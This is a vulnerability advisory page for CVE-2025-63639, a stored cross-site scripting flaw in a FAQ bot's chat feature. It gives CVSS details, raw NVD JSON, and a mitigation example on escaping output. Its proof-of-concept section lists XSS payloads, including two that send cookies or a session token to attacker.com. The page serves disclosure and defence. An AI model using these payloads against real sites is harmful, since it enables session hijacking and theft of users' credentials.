Security Vulnerability Report
CVE-2025-63639 CVSS 6.1 MEDIUM

CVE-2025-63639

Published: 2025-11-07 20:15:38
Last Modified: 2025-11-17 18:55:26

Description

The chat feature in the application Sourcecodester FAQ Bot with AI Assistant v1.0 is vulnerable to Cross-Site Scripting (XSS) due to improper handling of user-supplied input. An attacker can inject malicious HTML or JavaScript into chat messages, which executes in the browser of any user viewing the conversation.
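The rendering defect the description refers to (user-supplied chat text concatenated straight into markup) beside a hardened renderer, as an added example that is not code from this advisory or from the FAQ Bot project; the function names and the sample messages are constructed for illustration, and the browser-side variant assumes a DOM container element passed in by the caller.

```javascript
// Added example (not the advisory's or the project's code): contrast the
// unsafe pattern behind a stored XSS in a chat view with a hardened one.
// Function names and sample messages below are constructed for illustration.

// Unsafe: the message is pasted into the HTML string as-is, so any tag,
// script or event-handler attribute in it becomes part of the page for
// every user who views the conversation.
function renderMessageUnsafe(user, text) {
  return '<div class="msg"><b>' + user + '</b>: ' + text + '</div>';
}

// Safe: every character HTML treats specially is replaced by its entity
// exactly once, at output time. Covering & < > " ' makes the result inert
// both as element content and inside a double- or single-quoted attribute.
const HTML_ESCAPES = {
  '&': '&amp;',
  '<': '&lt;',
  '>': '&gt;',
  '"': '&quot;',
  "'": '&#39;',
};

function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (ch) => HTML_ESCAPES[ch]);
}

// Same template as the unsafe version, but both untrusted fields are
// escaped before they are placed in markup.
function renderMessageSafe(user, text) {
  return (
    '<div class="msg"><b>' + escapeHtml(user) + '</b>: ' + escapeHtml(text) + '</div>'
  );
}

// Browser-side equivalent: build nodes and assign textContent instead of
// innerHTML. textContent never parses markup, so no escaping step is needed.
// Assumes `container` is an existing DOM element; not called in this file.
function appendMessageToDom(container, user, text) {
  const div = document.createElement('div');
  div.className = 'msg';
  const bold = document.createElement('b');
  bold.textContent = user;
  div.appendChild(bold);
  div.appendChild(document.createTextNode(': ' + text));
  container.appendChild(div);
}

// Constructed sample messages: two of the payload shapes the advisory's PoC
// lists, plus an ordinary message to show benign text is unaffected.
const CONSTRUCTED_MESSAGES = [
  "<script>alert('XSS');</script>",
  '<img src=x onerror=alert(document.cookie)>',
  'hello, how do I reset my password?',
];

// Crude check used only for this demonstration: does the rendered fragment
// contain any '<' beyond the two the template itself emits (<div>, <b>)
// and the two closing tags? Any extra one came from the message.
function leaksMarkup(rendered) {
  return (rendered.match(/</g) || []).length > 4;
}

for (const msg of CONSTRUCTED_MESSAGES) {
  console.log('unsafe leaks markup:', leaksMarkup(renderMessageUnsafe('bob', msg)));
  console.log('safe   leaks markup:', leaksMarkup(renderMessageSafe('bob', msg)));
}
```

Escaping belongs at the point where text is placed into HTML, not at the point where it is stored: storing already-escaped text either double-escapes when the template escapes again or leaks when a different view renders it unescaped. On a page like this one, the `textContent` route is the simplest fix because the chat view already builds its DOM in JavaScript.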

CVSS Details

CVSS Score: 6.1
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:remyandrade:faq_bot_with_ai_assistant:1.0:*:*:*:*:*:*:* - VULNERABLE
Sourcecodester FAQ Bot with AI Assistant v1.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
HTML
<!-- CVE-2025-63639 PoC - Stored XSS in FAQ Bot Chat -->
<!-- Attack Vector: Inject malicious JavaScript via chat message input -->

<!-- Basic XSS Payload -->
<script>alert('XSS');</script>

<!-- Image Tag Event Handler XSS -->
<img src=x onerror=alert(document.cookie)>

<!-- SVG Element XSS -->
<svg/onload=alert('XSS')>

<!-- Body Event Handler XSS -->
<body onload=alert(document.location)>

<!-- iFrame XSS -->
<iframe src=javascript:alert('XSS')>

<!-- Cookie Stealing Payload -->
<script>fetch('https://attacker.com/steal?cookie='+document.cookie);</script>

<!-- Session Hijacking Payload -->
<script>var img=new Image();img.src='https://attacker.com/log?data='+sessionStorage.getItem('token');</script>

References

https://github.com/ChuckBartowski7/Vulnerability-Research/blob/main/CVE-2025-63639/README.md (Exploit, Mitigation, Third Party Advisory)
https://www.sourcecodester.com/javascript/18413/faq-bot-ai-assistant-using-html-css-and-javascript-source-code.html (Product)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-63639", "sourceIdentifier": "[email protected]", "published": "2025-11-07T20:15:38.113", "lastModified": "2025-11-17T18:55:26.417", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "The chat feature in the application Sourcecodester FAQ Bot with AI Assistant v1.0 is vulnerable to Cross-Site Scripting (XSS) due to improper handling of user-supplied input. An attacker can inject malicious HTML or JavaScript into chat messages, which executes in the browser of any user viewing the conversation."}, {"lang": "es", "value": "La función de chat en la aplicación Sourcecodester FAQ Bot con Asistente de IA v1.0 es vulnerable a Cross-Site Scripting (XSS) debido a un manejo inadecuado de la entrada proporcionada por el usuario. Un atacante puede inyectar HTML o JavaScript malicioso en los mensajes de chat, que se ejecuta en el navegador de cualquier usuario que vea la conversación."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:remyandrade:faq_bot_with_ai_assistant:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "999FC52A-4EE9-4869-8E8E-2D93D3BC84F8"}]}]}], "references": [{"url": "https://github.com/ChuckBartowski7/Vulnerability-Research/blob/main/CVE-2025-63639/README.md", "source": "[email protected]", 
"tags": ["Exploit", "Mitigation", "Third Party Advisory"]}, {"url": "https://www.sourcecodester.com/javascript/18413/faq-bot-ai-assistant-using-html-css-and-javascript-source-code.html", "source": "[email protected]", "tags": ["Product"]}]}}